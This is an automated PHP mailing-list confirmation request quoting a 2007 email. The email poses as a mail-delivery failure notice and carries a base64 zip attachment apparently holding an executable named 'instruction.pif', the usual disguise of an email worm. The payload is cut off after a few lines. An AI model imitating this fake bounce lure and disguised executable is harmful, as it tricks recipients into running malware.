Subject: PHP posting confirmation for [email-masked]

From: PHP Automoderator <[email-masked]>

This is an automatic reply to an email you sent to a PHP project
mailing address protected by our 'self-moderation' system. To reduce
the amount of spam received at these addresses, we require you to
confirm that you're a real person before your email will be allowed
through.

All you have to do in order to have your original message sent is
send an email to [email-masked] with the following text (square
brackets and all):

[confirm: 0a517d54e726c5f97ea8eab18a7247bb [email-masked]]

which you should be able to do simply by replying to this email.
(Don't worry, any leading text added for quoting will simply be
ignored.)

After we have received your confirmation, "[email-masked]"
will be added to the list of pre-approved mail addresses for all of
the PHP project mail addresses, your original message will be
delivered, and future emails from that address will be delivered
without delay automatically.

You will not receive any confirmation of your confirmation -- your
original message (and any other messages you have sent since then)
will simply be sent to its original destination (possibly after a
short delay).

Sorry for the hassle, but the volume of unsolicited commercial email
sent to these addresses has made this step necessary.

--- Your original email is below.

From: [email-masked]
To: [email-masked]
Subject: Returned mail: Data format error
Date: Fri, 25 May 2007 10:24:29 +0900

This is a multi-part message in MIME format.

------=_NextPart_000_0005_782A91D8.1791B08B
Content-Type: text/plain;
	charset=us-ascii
Content-Transfer-Encoding: 7bit

This message was not delivered due to the following reason:

Your message could not be delivered because the destination server was
unreachable within the allowed queue period. The amount of time
a message is queued before it is returned depends on local configura-
tion parameters.

Most likely there is a network problem that prevented delivery, but
it is also possible that the computer is turned off, or does not
have a mail system running right now.

Your message was not delivered within 8 days:
Host 219.198.59.40 is not responding.

The following recipients could not receive this message:
<[email-masked]>

Please reply to [email-masked]
if you feel this message to be in error.

------=_NextPart_000_0005_782A91D8.1791B08B
Content-Type: application/octet-stream;
	name="instruction.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="instruction.zip"

UEsDBAoAAAAAAA 4LuTapCL80gMAAAIDAAAAPAAAAaW5zdHJ1Y3Rpb2
4ucGlmTVqQAAMAAAAEAAAA
//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 2AAAAA4fug4